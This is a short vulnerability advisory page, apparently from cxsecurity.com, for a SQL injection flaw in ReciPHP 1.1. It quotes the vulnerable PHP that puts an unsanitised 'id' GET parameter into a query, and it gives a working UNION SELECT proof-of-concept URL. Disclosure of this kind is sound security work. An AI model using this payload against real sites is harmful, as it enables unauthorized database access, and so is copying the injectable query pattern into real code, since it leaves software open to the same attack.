ReciPHP 1.1 SQL Injection

2012.11.15
Credit: cr4wl3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

\#'#/ (-.-) --------------------oOO---(_)---OOo---------------------- | ReciPHP 1.1 SQL Injection Vulnerability | --------------------------------------------------------- [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Site: http://0xuht.org [!] Download: http://sourceforge.net/projects/reciphp/files/ [!] Version: 1.1 [!] Date: 14.11.2012 [!] Remote: yes [!] Tested: Ubuntu [!] Reference: http://0xuht.org/Exploit/reciphp.txt [!] Vulnerability Code [showrecipe.inc.php] : <?php include 'config.php'; ?> <div id="main"> <div id='preview'><?php $recipeid = $_GET['id']; $query = "SELECT title,poster,shortdesc,ingredients,directions from recipes where recipeid = $recipeid"; $result = mysql_query($query) or die('Could not find recipe'); [!] PoC (Piye om Carane): [ReciPHP]/index.php?content=showrecipe&id=-3 union select version(),2,3,4,5-- [!] Demo: http://0xuht.org/demo/reciphp.png [!] Thanks: packetstormsecurity // Gorontalo [2012-11-14]

References:

http://0xuht.org/Exploit/reciphp.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top